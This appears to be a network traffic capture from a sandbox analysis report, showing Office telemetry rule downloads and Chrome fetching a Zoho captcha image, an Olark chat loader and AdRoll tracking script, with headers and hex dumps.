                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                              x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202828Z-185f5d8b95csd4bwhC1NYCq7dc0000000aqg00000000bnzn
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              91192.168.2.54982513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                              x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202828Z-178bfbc474bscnbchC1NYCe7eg00000000ng00000000hh1e
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              92192.168.2.54982413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                              x-ms-request-id: 1b8ab84b-001e-0082-570c-3b5880000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202828Z-r1d97b99577sdxndhC1TEBec5n00000009h0000000005d82
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              93192.168.2.54982313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                              x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202828Z-178bfbc474btrnf9hC1NYCb80g00000000fg00000000sywk
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              94192.168.2.549834136.143.190.1004431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC499OUTGET /static/showcaptcha?digest=1_C_38981b8bddce8f162a418db411f998572c5cedc5527ed5cb91c0d48ae1d4feb63474de35340d2e69db0bcf470182544679866327c1bf1bf70db3eecfa72f2b6c HTTP/1.1
                                                                                                                                                                                              Host: accounts.zoho.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:28 UTC519INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Content-Type: image/png;charset=UTF-8
                                                                                                                                                                                              Content-Length: 2835
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_e188bc05fe=8db261d30d9c85a68e92e4f91ec8079a; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                              2024-11-20 20:28:28 UTC2835INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 4b 08 02 00 00 00 ba 1e 5f bf 00 00 0a da 49 44 41 54 78 5e ed 9c 7b 4c 4f ff 1f c7 8f 2f 25 e5 92 44 24 86 91 4b 26 e6 ba 9a 42 a2 b9 b3 8c 25 d7 51 48 2c 97 32 3f 97 14 e6 9a 86 e4 16 59 9b eb c6 18 69 43 a9 19 b9 66 8c 90 4d 8d 72 cb 6d d2 c5 a5 7e 4f 9f 8f ce de 9f d7 39 e7 f3 39 7d ea 50 79 3f fe ca fb f3 7c bd cf 39 ef cf f3 fd 7e bf 5e e7 9c 0f a1 8c c3 d1 00 81 36 70 38 55 01 37 16 47 13 b8 b1 38 9a c0 8d c5 d1 04 6e 2c 8e 26 70 63 71 34 81 1b 8b a3 09 dc 58 1c 4d e0 c6 e2 68 02 37 16 47 13 b8 b1 38 9a c0 8d c5 d1 04 6e 2c 8e 26 70 63 71 34 81 1b 8b a3 09 dc 58 1c 4d e0 c6 aa 7a 32 33 33 b7 2b 90 96 96 46 d5 b5 14 6e ac aa 67 da b4 69 82 02 ae ae ae 54 5d 4b a9 25 c6 2a 29 29 e9
                                                                                                                                                                                              Data Ascii: PNGIHDRK_IDATx^{LO/%D$K&B%QH,2?YiCfMrm~O99}Py?|9~^6p8U7G8n,&pcq4XMh7G8n,&pcq4XMz233+FngiT]K%*))


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              95192.168.2.549828192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC527OUTGET /jsclient/loader.js HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:28 UTC416INHTTP/1.1 200 OK
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 5520
                                                                                                                                                                                              Cache-Control: max-age=10800
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:28 GMT
                                                                                                                                                                                              Etag: "673d0962-2325+ident"
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 23:28:28 GMT
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 21:55:46 GMT
                                                                                                                                                                                              Server: ECS (lhd/3709)
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 8997
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:28 UTC8997INData Raw: 21 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 6e 2c 6f 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 61 2c 73 29 7b 69 66 28 21 6e 5b 61 5d 29 7b 69 66 28 21 65 5b 61 5d 29 7b 76 61 72 20 6c 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 73 26 26 6c 29 72 65 74 75 72 6e 20 6c 28 61 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 61 2c 21 30 29 3b 76 61 72 20 75 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 61 2b 22 27 22 29 3b 74 68 72 6f 77 20 75 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 75 7d 76 61 72 20 63 3d 6e 5b 61 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 5b 61 5d 5b 30 5d 2e 63 61
                                                                                                                                                                                              Data Ascii: !function t(e,n,o){function r(a,s){if(!n[a]){if(!e[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var u=new Error("Cannot find module '"+a+"'");throw u.code="MODULE_NOT_FOUND",u}var c=n[a]={exports:{}};e[a][0].ca


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              96192.168.2.54983318.165.220.614431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:28 UTC373OUTGET /j/GXXT3DJJNNBKHGBC62RAND/roundtrip.js HTTP/1.1
                                                                                                                                                                                              Host: s.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:28 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 120231
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 12:03:29 GMT
                                                                                                                                                                                              Etag: "a60cc99f2fa7d8be630927ab20fc597f"
                                                                                                                                                                                              X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                              Cache-Control: max-age=3600, must-revalidate
                                                                                                                                                                                              X-Amz-Version-Id: oWcbi6qMfwD1pKJOfG7NZjRglZlRbXHq
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                              Via: 1.1 be46a1f14e255e7d68c1d22f8127120c.cloudfront.net (CloudFront)
                                                                                                                                                                                              Age: 4
                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                              Access-Control-Allow-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Max-Age: 600
                                                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                                                              X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                              X-Amz-Cf-Id: R71rKzk1ySc6lobw_WwBTj8os0qkuIiPM3HuRN9sFJE27DZfvjJ0Hw==
                                                                                                                                                                                              2024-11-20 20:28:28 UTC16384INData Raw: 74 72 79 20 7b 0a 20 20 20 20 0a 20 20 20 20 5f 5f 61 64 72 6f 6c 6c 2e 6c 6f 61 64 5f 61 64 72 6f 6c 6c 5f 74 70 63 28 5f 5f 61 64 72 6f 6c 6c 2e 72 65 6e 64 65 72 5f 61 64 76 65 72 74 69 73 61 62 6c 65 5f 63 65 6c 6c 29 3b 0a 7d 0a 63 61 74 63 68 28 65 29 20 7b 7d 0a 0a 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 5f 61 64 72 6f 6c 6c 5f 5f 28 29 7b 74 68 69 73 2e 70 78 6c 73 74 61 72 74 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3b 74 68 69 73 2e 76 65 72 73 69 6f 6e 3d 22 32 2e 30 22 3b 74 68 69 73 2e 65 78 70 3d 38 37 36 30 3b 74 68 69 73 2e 65 65 78 70 3d 37 32 30 3b 74 68 69 73 2e 70 76 3d 31 45 31 31 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 74 68 69 73 2e 5f 5f 61 64 63 3d 22 5f 5f 61 72 5f 76 34
                                                                                                                                                                                              Data Ascii: try { __adroll.load_adroll_tpc(__adroll.render_advertisable_cell);}catch(e) {}try { function __adroll__(){this.pxlstart=(new Date).getTime();this.version="2.0";this.exp=8760;this.eexp=720;this.pv=1E11*Math.random();this.__adc="__ar_v4
                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 3d 21 31 2c 65 3d 74 68 69 73 3b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 3d 21 30 7d 2c 62 7c 7c 35 30 30 29 3b 63 28 29 7d 3b 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 74 65 72 6e 61 6c 5f 64 61 74 61 5f 74 6f 5f 71 73 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 5b 5d 3b 69 66 28 74 68 69 73 2e 5f 69 73 5f 76 31 5f 74 6f 5f 76 32 5f 73 68 69 6d 28 29 29 7b 62 3d 61 3b 76 61 72 20 64 3d 74 68 69 73 2e 67 65 74 5f 65 78 74 65 72 6e 61 6c 5f 64 61 74 61 28 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 64 29 7b 61 3d 61 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 64 29 64 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22
                                                                                                                                                                                              Data Ascii: =!1,e=this;window.setTimeout(function(){d=!0},b||500);c()};__adroll__.prototype.external_data_to_qs=function(a,b){var c=[];if(this._is_v1_to_v2_shim()){b=a;var d=this.get_external_data();if(null!==d){a=a||{};for(var e in d)d.hasOwnProperty(e)&&"undefined"
                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 6c 69 73 74 65 6e 54 6f 45 76 65 6e 74 4f 6e 63 65 28 6c 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 22 63 6c 69 63 6b 22 2c 74 68 69 73 2e 5f 66 6f 72 6d 5f 74 70 5f 63 6c 69 63 6b 2e 62 69 6e 64 28 74 68 69 73 29 2c 22 5f 66 6f 72 6d 5f 74 70 5f 63 6c 69 63 6b 22 29 29 7d 74 68 69 73 2e 5f 61 64 72 6f 6c 6c 5f 74 70 5f 66 6f 72 6d 73 3d 6b 3b 74 68 69 73 2e 5f 61 64 72 6f 6c 6c 5f 74 70 5f 66 69 65 6c 64 73 3d 70 2e 6a 6f 69 6e 28 22 2c 22 29 3b 67 3d 74 68 69 73 2e 5f 62 6f 64 79 28 29 3b 74 68 69 73 2e 6c 69 73 74 65 6e 54 6f 45 76 65 6e 74 4f 6e 63 65 28 67 2c 22 62 6c 75 72 22 2c 74 68 69 73 2e 5f 66 6f 72 6d 5f 74 70 5f 63 68 61 6e 67 65 2e 62 69 6e 64 28 74 68 69 73 29 2c 22 5f 66 6f 72 6d 5f 74 70 5f 63
                                                                                                                                                                                              Data Ascii: listenToEventOnce(l.contentWindow.document.body,"click",this._form_tp_click.bind(this),"_form_tp_click"))}this._adroll_tp_forms=k;this._adroll_tp_fields=p.join(",");g=this._body();this.listenToEventOnce(g,"blur",this._form_tp_change.bind(this),"_form_tp_c
                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 61 29 72 65 74 75 72 6e 20 64 2e 64 65 63 6f 6d 70 72 65 73 73 28 61 29 3b 66 6f 72 28 76 61 72 20 63 3d 41 72 72 61 79 28 61 2e 6c 65 6e 67 74 68 2f 32 29 2c 66 3d 30 2c 6b 3d 63 2e 6c 65 6e 67 74 68 3b 66 3c 6b 3b 66 2b 2b 29 63 5b 66 5d 3d 32 35 36 2a 61 5b 32 2a 66 5d 2b 61 5b 32 2a 66 2b 31 5d 3b 76 61 72 20 70 3d 5b 5d 3b 63 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 70 2e 70 75 73 68 28 62 28 61 29 29 7d 29 3b 72 65 74 75 72 6e 20 64 2e 64 65 63 6f 6d 70 72 65 73 73 28 70 2e 6a 6f 69 6e 28 22 22 29 29 7d 2c 63 6f 6d 70 72 65 73 73 54 6f 45 6e 63 6f 64 65 64 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c
                                                                                                                                                                                              Data Ascii: |"undefined"===typeof a)return d.decompress(a);for(var c=Array(a.length/2),f=0,k=c.length;f<k;f++)c[f]=256*a[2*f]+a[2*f+1];var p=[];c.forEach(function(a){p.push(b(a))});return d.decompress(p.join(""))},compressToEncodedURIComponent:function(a){return null
                                                                                                                                                                                              2024-11-20 20:28:29 UTC16384INData Raw: 29 3b 66 26 26 28 6b 2e 70 75 73 68 28 5b 22 61 64 72 6f 6c 6c 5f 70 72 6f 64 75 63 74 73 22 2c 77 69 6e 64 6f 77 2e 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 68 69 73 2e 6a 73 6f 6e 53 74 72 69 6e 67 69 66 79 28 66 29 29 5d 29 2c 61 2e 70 72 6f 64 75 63 74 73 7c 7c 28 61 2e 70 72 6f 64 75 63 74 73 3d 66 29 29 3b 6b 2e 70 75 73 68 28 5b 22 61 64 72 6f 6c 6c 5f 76 65 72 73 69 6f 6e 22 2c 0a 74 68 69 73 2e 67 65 74 5f 76 65 72 73 69 6f 6e 28 29 5d 29 3b 28 67 3d 74 68 69 73 2e 65 78 74 65 72 6e 61 6c 5f 64 61 74 61 5f 74 6f 5f 71 73 28 64 2c 21 30 29 29 26 26 6b 2e 70 75 73 68 28 5b 67 5d 29 3b 67 3d 74 68 69 73 2e 5f 73 72 76 28 74 68 69 73 2e 62 75 69 6c 64 75 72 6c 28 22 2f 70 2f 22 2b 74 68 69 73 2e 5f 67 6c 6f 62 61 6c 28 22 61 64 72
                                                                                                                                                                                              Data Ascii: );f&&(k.push(["adroll_products",window.encodeURIComponent(this.jsonStringify(f))]),a.products||(a.products=f));k.push(["adroll_version",this.get_version()]);(g=this.external_data_to_qs(d,!0))&&k.push([g]);g=this._srv(this.buildurl("/p/"+this._global("adr
